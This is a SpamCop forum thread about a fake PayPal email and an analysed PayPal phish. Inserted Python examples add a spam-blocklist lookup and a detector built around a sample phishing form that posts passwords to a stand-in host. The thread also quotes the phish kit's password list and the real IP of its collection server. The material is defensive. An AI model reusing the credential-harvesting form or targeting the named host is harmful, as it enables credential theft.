
Taking it to the next level.


johnwade


Hi

I may not be entirely clear as to exactly what spamcop does and how effective it is. From what I can tell it tries to determine where the email originates from, then determines what the complaints dept. email is and sends a report.

Is there more to it than that because I don't think that's going to have much of an impact based on where it appears the reports are being sent in the case of the emails I'm getting from one fellow in particular.

I received an email today allegedly from PayPal (I called and it's not from them) addressed to the email address of mine that the spammer is sending my email to. (I've unsubscribed, found alternate emails of his and sent polite letters and even left messages on his cell phone as I found the number and at a place he works).

The email subject line: Auto Response - Reply PayPal Email (KMM83576559V19825L0KM) :ppNA

The email content:

Hello John Wade,

We want to help you but we're not able to respond directly to emails sent to this address.

If you have a question about your account, please contact us through our website. Here's how:

1. Go to the PayPal website and log in to your account.
2. Click "Contact Us" at the bottom of any page.
3. Click "Contact Customer Service," and ask your question.

One of our Customer Service agents will reply to your question.

We value your business and want to provide you with the best customer care.

Thanks,
PayPal

This email is sent to you by the contracting entity to your User Agreement, either PayPal Inc, PayPal Pte. Ltd or PayPal (Europe) S.à r.l. & Cie, S.C.A. Société en Commandite par Actions, Registered Office: 5th Floor 22-24 Boulevard Royal L-2449, Luxembourg RCS Luxembourg B 118 349.

Unless they have something planted on my computer to record key strokes I can't imagine how this would benefit them but I thought I'd seek opinions on this forum.

I'm interested in recommendations as to what I can do to maximize my security. I'm using a Mac laptop, iPhone, and iPad and I'm using NetBarrier and VirusBarrier by Intego.

I'm also interested in what I can do to take it to the next level to shut this particular spammer down.


I may not be entirely clear as to exactly what spamcop does and how effective it is. From what I can tell it tries to determine where the email originates from, then determines what the complaints dept. email is and sends a report.

Is there more to it than that because I don't think that's going to have much of an impact based on where it appears the reports are being sent in the case of the emails I'm getting from one fellow in particular.

Actually, what you don't see is that SpamCop takes the information from users' reports and its own resources and uses them to update a real-time DNS block list (the SpamCop Blocking List). This list is used by many mail providers all over the world as one means to detect incoming spam. So, even if your individual reports don't accomplish much for you personally, they do eventually make their way to the SCBL where they can be of help to everyone (or at least to customers of mail services who use SCBL for spam detection).

While occasionally mail admins do use SC reports to fix their spam problems, many more services don't have the abuse-desk resources, don't care, don't know how, or are just flat crooked. So, the individual reports won't change their behavior, but perhaps landing on the SCBL will be more of a goad to them.

I received an email today allegedly from PayPal (I called and it's not from them) addressed to the email address of mine that the spammer is sending my email to. (I've unsubscribed, found alternate emails of his and sent polite letters and even left messages on his cell phone as I found the number and at a place he works).
Well, to me this seems to be a slam-dunk: if it didn't come from PayPal (as it appears to claim), it is very likely to be a "phish" message (i.e., an attempt to get you to surrender your PayPal credentials). The mail headers of these messages could prove pretty positively whether or not they come from PayPal. Possibly they have given you a web link in the message that's supposed to go to the PayPal website but instead goes to a site under the spammer's control.

Whatever the case, the best response to this sort of stuff is to ignore it -- do not attempt to answer, do not use any of its links, etc. You can report it thru SpamCop if you like (and if you are sure it is spam).

I'm interested in recommendations as to what I can do to maximize my security. I'm using a Mac Laptop, iphone, and iPad and I'm using NetBarrier and VirusBarrier by Intego.
Security isn't necessarily something you buy and install -- it is something that you DO. The extra software won't help you if you consistently download and run untrusted files, run public servers on your machine (e.g., FTP or web), or hand out passwords indiscriminately. Yes, a handgun or a can of mace might help you if you find yourself in a bad neighborhood, but the best might be just to stay out of the bad neighborhood altogether.

I am also a Mac user, but I haven't really installed much in the way of add-on security, Macs are pretty well-protected out of the box as long as you don't kneecap them yourself (e.g., by turning off the firewall, installing rogue software, opening random unneeded internet servers, or handing out info to strangers). I have WiFi, and I have set it up for MAC-based access (that's MAC as in Ethernet address, not MAC as in Apple Computer), which pretty much makes my WiFi inaccessible to any device except for those known to me. Most modern WiFi routers have this feature.

I'm also interested in what I can do to take it to the next level to shut this particular spammer down.
Unless you are the police, or a major shareholder in the network provider whose resources the spammer is using, you aren't in much of a position to deal with a recalcitrant network provider. However, you can just keep reporting them and (one hopes) keep them on the blocking list (which does eventually give them a clue).

-- rick

(p.s., these ravings are my own and not official statements from SpamCop; this is, as you can see, a user-to-user forum by and large.)

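Rick's two points above (the SCBL is consulted by receiving mail servers, and the Received headers show where a message really came from) as an added, runnable illustration that is not code from the thread or from SpamCop. It finds the IP that handed a message to our border MX, builds the reversed-octet DNSBL query name for bl.spamcop.net, and classifies the answer; the sample headers, the 192.0.2.0/24 "our relays" range and the offline fake resolver are constructed assumptions.

```python
import re
import socket
from ipaddress import ip_address, ip_network
from typing import Callable, Optional

SCBL_ZONE = "bl.spamcop.net"            # SpamCop's public DNSBL zone
LISTED_NET = ip_network("127.0.0.0/8")  # DNSBLs answer with a loopback-range A record

# Constructed sample headers: our MX (192.0.2.10) accepted the message from an
# external host 198.51.100.77, then relayed it to the internal mail store.
SAMPLE_HEADERS = (
    "Received: from mx1.example.net (mx1.example.net [192.0.2.10])\n"
    "\tby store.example.net with ESMTP; Mon, 8 Apr 2013 10:00:02 +0000\n"
    "Received: from dsl-pool.invalid (unknown [198.51.100.77])\n"
    "\tby mx1.example.net with SMTP; Mon, 8 Apr 2013 10:00:00 +0000\n"
    "Subject: Auto Response - Reply PayPal Email\n"
)
OUR_RELAYS = [ip_network("192.0.2.0/24")]  # assumed: hops written by our own servers

def received_ips(headers: str) -> list:
    """IPs of the SMTP clients named in each Received: header, top-down."""
    unfolded = re.sub(r"\r?\n[ \t]+", " ", headers)  # join folded continuation lines
    ips = []
    for line in unfolded.splitlines():
        if line.lower().startswith("received:"):
            m = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", line)
            if m:
                ips.append(m.group(1))
    return ips

def border_client_ip(headers: str, our_relays=OUR_RELAYS) -> Optional[str]:
    """First hop that is not one of our own relays: the host that handed the
    message to our border MX. Only headers our own servers wrote are trustworthy;
    anything below them could have been forged by the sender."""
    for ip in received_ips(headers):
        if not any(ip_address(ip) in net for net in our_relays):
            return ip
    return None

def dnsbl_name(ip: str, zone: str = SCBL_ZONE) -> str:
    """DNSBL convention: octets reversed, then the zone (a.b.c.d -> d.c.b.a.zone)."""
    octets = ip_address(ip).exploded.split(".")  # also rejects malformed input
    return ".".join(reversed(octets)) + "." + zone

def scbl_status(ip: str, resolve: Callable[[str], str] = socket.gethostbyname) -> str:
    """'listed', 'not-listed' or 'unknown' (temporary DNS failure or a non-DNSBL answer)."""
    try:
        answer = resolve(dnsbl_name(ip))
    except socket.gaierror as e:
        # NXDOMAIN means "not listed"; anything else is a lookup failure, not a verdict
        return "not-listed" if e.errno == socket.EAI_NONAME else "unknown"
    except OSError:
        return "unknown"
    try:
        listed = ip_address(answer) in LISTED_NET
    except ValueError:
        return "unknown"
    # An answer outside 127/8 is not a DNSBL verdict (e.g. an ISP's NXDOMAIN redirect)
    return "listed" if listed else "unknown"

def fake_resolver(table: dict) -> Callable[[str], str]:
    """Offline stand-in for DNS so the example runs without network access."""
    def resolve(name: str) -> str:
        if name in table:
            return table[name]
        raise socket.gaierror(socket.EAI_NONAME, "Name or service not known")
    return resolve

if __name__ == "__main__":
    client = border_client_ip(SAMPLE_HEADERS)
    resolver = fake_resolver({"77.100.51.198.bl.spamcop.net": "127.0.0.2"})
    print(client, dnsbl_name(client), scbl_status(client, resolver))
```

Replace `fake_resolver(...)` with the default `socket.gethostbyname` to query the real zone; a "listed" answer is one input to a spam score, not a reason on its own to drop the message.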

Hi John,

Yes, you missed the main point of SpamCop - user reports and spamtrap hits on the source of the spam supporting the blocklist of such addresses while (and only while) they are active and a major nuisance. It is SC's niche amongst the public blocklist provisioners. Reports to responsible abuse addresses are very nice and have the potential to dismantle whole botnets or get persistent individuals "de-hosted" but, alas, that would require that the majority of ISPs behind the abuse addresses be responsive and good at enforcing their own AUPs/TOSs/CRAs which is possibly not the case for all sorts of reasons (including dedication to their own "in-house" anti-spam solutions).

PayPal have their own anti-spoof measures and reporting addresses (spoof[at]paypal.com or a regional equivalent), not sure how effective that is these days but surely over-worked since they insist on sending "policy updates" and the like when user accounts have been set up to decline those (which may be an option either silently removed or hard to find in current accounts? not sure) - and although they have advice pages with notes and illustrations on how to "Identify a hoax" (which are tucked away in the secure member pages and very basic) they undermine confidence when they will sometimes repudiate what turn out to be legitimate contacts from some part of their enterprise which (I guess) their "spoof[at]" address hasn't heard of before, going by my own past experiences.

Now it rather looks to me like you are wanting to talk about a genuine PayPal auto-response - though they deny it and though it may not have been you that initiated it (through some e-mail or website action) on behalf of your account. If you want to talk about spam/phishes, actual or suspected, here then use a tracking URL as is conspicuously requested in our FAQs. The "trick" to that, when you're discussing a suspect spam/phish, is to CANCEL the offer to send the report after the submission has been parsed. You may have to revert to the webform SC submission of the item to allow you to munge any personal identification you don't want to be public but which SC perhaps does not munge for you - but that is still quicker than trying to second-guess the information staff or members here need to see in order to help - and that data in the tracking URL is one step removed from the point of discussion so inherently a little more secure.

As and when you get the chance, continue to read the FAQs and research previous discussions - the knowledge is cumulative (and sometimes needs to be re-read in the light of subsequent understanding) but tends to answer questions you may not even have thought of yet. Yes, you need to be dedicated to go that far but you seem to be sufficiently interested.

[above posted before seeing Rick's response but leaving it stand since it reinforces/complements some of his]


The thing about the email not really from PayPal that got my spidey sense tingling is there were no links, no attempts to get any information from me directly or indirectly. Why send it? Made me wonder if there was some way to monitor keystrokes.

Thanks for the info about DNS block list. That makes me feel a little bit better about taking the time to forward the emails.

As an aside, one just came back from my host:

This message has been rejected because it has
a potentially executable attachment "The BEST Squeeze Page Plugin EVER? (open now).eml"
This form of attachment has been used by
recent viruses or other malware.
If you meant to send this file then please
package it up as a zip file and resend it.

I'll read up on the MAC ethernet.

BTW, I check off the notify when there are replies but I don't seem to get them.

- John


As it happens, I just received a PayPal phish mail. I got the tracking URL from the parse page and have pasted it below so people can get a look:

http://www.spamcop.net/sc?id=z5487293633z4...c21c40399e5e10z

This message pretends to be from PayPal but is not, as the headers indicate. The spammer attached a MIME-encoded HTML file, which is automatically VERY suspicious behavior (why bother encoding and attaching? Why not just put it right into the body?). I only ever see this in spam or phishing mail (makes it less likely that the complete message will be scanned and possibly rejected by a spam filter).

Sure enough, the encoded HTML file contained a form with an action pointing to a website where my PayPal credentials would have been collected had I been unwise enough to submit them.

Pretty typical prank; nothing technically exotic, just a bit of "human engineering" aimed at the gullible.

-- rick


1. Good work Rick. Interesting table in the encoded bits:

blacklist_pwds=["password","69696969","11223344","12121212","12312312","12341234","13131313",
"18675309","23232323","access14","americanidol","baseball","baseball1","bigdaddy","blink182","butthead",
"cocacola","computer","corvette","cowboys","danielle","dolphins","einstein","firebird","football","football1",
"Iloveyou","iloveyou1","internet","jennifer","jordan23","liverpool","liverpool1","marlboro","maverick","melanie",
"michelle","midnight","mistress","mountain","myspace1","Password","password1","princess1","qwertyui",
"redwings","rush2112","samantha","scorpion","slipknot1","srinivas","startrek","starwars","sunshine","superman"
,"superman1","swimming","trustno1","victoria","whatever"]

Thank goodness my password "password2" passes muster, eh? And danielle, jennifer, melanie, michelle, samantha and victoria have been loved to death. A bit like Windows™ itself although Windows 8 seems to be rectifying that situation very nicely.

So, if I'm reading it rightly, info collected by that one gets sent to a softlayer-hosted site (173.192.132.178 - I'm not quoting the resolved name and the PTR record doesn't point to it), domain created 01-Aug-2007 through DomainsByProxy.com, network abuse address abuse[at]cimediagroup.com, organisation abuse address abuse[at]softlayer.com - "outed" by phishtank operator "cybercrime " on Feb 17th 2013 11:41 PM (UTC) and the site is still running, not abandoned, still apparently harmless and responding normally to search engines (and presumably only works its cybercrime magic when hit by an incoming fake PayPal form).

A clever faux PayPal site (or intercept) should be readily detectable through its security certificate fingerprint not matching the real deal one fetched independently (https://www.grc.com/fingerprints.htm) but I'm not sure that comes into play with your example Rick. The phishtank sighting sort of infers it might, if "cybercrime" saw the same but the PayPal site he/they link to is the real one which confuses me.

Yeah, I've seen all the HTML attachments before, been around for a while, very worried when first sighted because of the following. Pretty-well bulletproof when it comes to AV fingerprints but "behavior" might trigger some when accessed, otherwise relying on browser internet security settings which might not be enough. The decoded HTML file in your example is currently recognized by only two AVs in the VirusTotal battery:

https://www.virustotal.com/en/file/2a06459533f82e672ad51d79c94deb5c6ad8d2cdcef939757b880f0b8af936da/analysis/1365558646/

Those two also detect it in the encoded (Base64) state inside mime boundary

https://www.virustotal.com/en/file/5993ed7393651403e0eae2dccf061678861c41d30836b9416c9837ddcef419d1/analysis/1365558977/

PayPal customers simply have to remember PayPal (says) they NEVER send attachments. Other service providers do, which is one cornerstone of the human engineering construct. I don't think victims of this one, especially infrequent PayPal users, are especially/necessarily gullible, given the generalised chaos and abundant distractions.

2. Don't know about the O/P's PayPal example though, no attachments reported for that one, no links even, still think it could be a genuine part of the PayPal Auto Response system, albeit possibly triggered by some sort of hack attempt/third party activity, might have known more with a tracking URL, never will without, IMO. Not a good thing to be seeing anyway, if the O/P is sure he did nothing to trigger it himself (he might simply read it as, effectively, an alert then, alarming enough, but not a phish as such if it is genuine but he didn't cause it).

BUT yes, use in conjunction with a key-logger would be possible and scans should be made with your regular AV and anything else you can throw at the job (a specialised anti-malware scan might find things AV won't, and a second AV might [does sometimes] find things the first doesn't but you may be limited to web-based scans for the second to avoid clashes/intrusive installations). Include the Kaspersky anti-rootkit utility TDSSKiller as a free tool for a one-off scan:

http://support.kaspersky.com/5350?el=88446

Since nothing short of re-formatting the hard-drive(s) - not even then sometimes - and rebuilding the operating system gives complete assurance, the next step well short of that point might be running MalwareBytes and hijackthis under the tutelage of one of the volunteer guides at bleepingcomputer.com or similar. I wouldn't be going that far without seeing some evidence of exploit, myself, but yes, some of these sods of cybercriminals are reputed to be very patient sometimes and wait a while before using gathered data.

It can be easy to go overboard on this - some folk allegedly wear out hard-drives with too-frequent full-system scans. That's the wrong pathway. Even frequent recourse to last known good backups may be excessive (not to mention a pain to then get up to date, safely) but many people go that way, probably because they deem their browsing/net use unavoidably and exceptionally risky and aren't using virtual PCs for some excellent reason. Can only repeat the words on the cover of The Hitchhiker's Guide to the Galaxy - "Don't Panic."

Just my opinion.


Wow, how did this guy know all my passwords?...
:lol:

Yes, your attachment is just the stand-alone form, with a local address, nothing to indicate actual PayPal connection except for the externally-linked graphics (at least one of which is a broken link under some security settings) and some information pages. The wording is clumsy in places, some of the controls are French, others English, layout is partly broken - barely usable for the PayPal details - for some browsers (for all of mine, anyway) and form completion and sending won't function at all without browser/script security settings relaxed and then shows the true destination for the fatal "Record" button (if scroll-over reveal is enabled).

Your characterisation "Pretty typical prank; nothing technically exotic, just a bit of "human engineering" aimed at the gullible." makes a lot more sense now. But it could easily have been made totally slick. Not sure we can trust in the typical scammer incompetence for all of this type.

Interesting and appropriately cautionary is my take on it, even if not especially dangerous in this instance. Phishtank got it slightly wrong, showing the PayPal landing page in connection with this one - or the same (external) collection point is used by several gangs/individuals using different methods. Not sure how that would work or even if it works at all but would like to imagine them competing for any spoils.

Wouldn't try looking more closely with a real Windows machine, just in case (and with my limited understanding). One day some budding "Artemis Fowl" is going to come on the scene, surely. Logic says we can't forever overestimate them. But no criminal mastermind this time, I think, and a few tools mentioned in previous post that may help when one does come along.

Steve


It's not all that scary; I think the lesson here is that messages like the one I reported on are not harmful at all, as long as you do not try to respond to them directly in any way. If you are told you have a problem with your PayPal account, you should contact PayPal directly (using a URL that you type in yourself) and then check on it there. Or, call them on the old fashioned telephone using a number you find yourself.

-- rick


2 weeks later...

johnwade, my guess is that some of your security software or the spammer's ineptitude caused there to be no HTML attachment or phishing link in the email when you opened it. That looks like a standard phishing email, which would either include an HTML form that submits data to some non-PayPal server, or a link to a hosted phishing site with a similar form.

Whereas SpamCop is designed to attack the source of spam, PhishTank is designed to expose phishing URLs. I highly suggest submitting phishing emails to them, to help out everyone else. They don't actually send reports like SpamCop does, so you don't have to worry about passing personal information back to the malicious sender, it just flags the site as being bad.

Usually the destination that the HTML form submits to will then forward you to the actual site that's being phished (i.e. www.hackersite.com/stealyourdata.php -> www.paypal.com), which causes PhishTank to display the actual PayPal site as the screenshot when sending them the form submission URL. While this is technically not exactly accurate, it does make the URL appear to be a standard phishing site when others are examining and voting on it (which is helpful because some people there refuse to mark anything as a phish if it doesn't have explicit logon fields).

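The attached-HTML-form phish that Rick dissected earlier and that the post above describes in general terms (a form whose action posts to a non-PayPal server), as an added example that is not code from the thread or from PhishTank or SpamCop. It decodes any HTML attachment from a MIME message and lists the hosts its forms submit to, flagging those outside the brand's domain; the sample message, the `collector.invalid` host and the `expected_domain` parameter are constructed assumptions.

```python
import base64
from email import message_from_string
from email.message import Message
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed look-alike of the attached form: credentials are posted to an
# unrelated host while the page dresses itself up as PayPal.
PHISH_FORM = """<html><body><h1>PayPal Security Check</h1>
<form method="post" action="http://collector.invalid/stealyourdata.php">
Email <input name="login_email"> Password <input name="login_password" type="password">
<input type="submit" value="Record"></form></body></html>"""

ENCODED = base64.b64encode(PHISH_FORM.encode()).decode()  # attached MIME-encoded, as in the thread

# Constructed message: forged PayPal sender, plain-text body, base64 HTML attachment.
SAMPLE_MAIL = f"""From: "PayPal" <service@paypal.com>
To: john@example.net
Subject: Your account has been limited
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Please open the attached form to restore access.
--b1
Content-Type: text/html; name="PayPal-form.html"
Content-Disposition: attachment; filename="PayPal-form.html"
Content-Transfer-Encoding: base64

{ENCODED}
--b1--
"""

class FormActions(HTMLParser):
    """Collects the action attribute of every <form> in a document."""
    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            self.actions.append(dict(attrs).get("action") or "")

def html_attachments(msg: Message) -> list:
    """Decoded text of every text/html part delivered as an attachment."""
    out = []
    for part in msg.walk():
        is_attached = part.get_content_disposition() == "attachment" or part.get_filename()
        if part.get_content_type() == "text/html" and is_attached:
            raw = part.get_payload(decode=True)  # undoes base64 / quoted-printable
            out.append(raw.decode(part.get_content_charset() or "utf-8", "replace"))
    return out

def form_hosts(html: str) -> list:
    parser = FormActions()
    parser.feed(html)
    return [urlsplit(a).hostname or "" for a in parser.actions]

def suspicious_forms(raw_mail: str, expected_domain: str) -> list:
    """Hosts that attached forms post to, other than expected_domain or its subdomains.
    A relative/empty action is reported too: it submits wherever the file is opened."""
    bad = []
    for html in html_attachments(message_from_string(raw_mail)):
        for host in form_hosts(html):
            if host != expected_domain and not host.endswith("." + expected_domain):
                bad.append(host or "(relative)")
    return bad

if __name__ == "__main__":
    print(suspicious_forms(SAMPLE_MAIL, "paypal.com"))  # ['collector.invalid']
```

The same check applies to a linked phishing page once fetched; the host list is what you would submit to PhishTank or to the reporting address mentioned below, not a verdict by itself.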

<snip>

Whereas SpamCop is designed to attack the source of spam, PhishTank is designed to expose phishing URLs. I highly suggest submitting phishing emails to them, to help out everyone else.

<snip>

...FWIW, I have SpamCop send mine to reportphishing[at]antiphishing.org (I added this address to http://www.spamcop.net/mcgi?action=showadvanced, Preferences > Report Handling Options).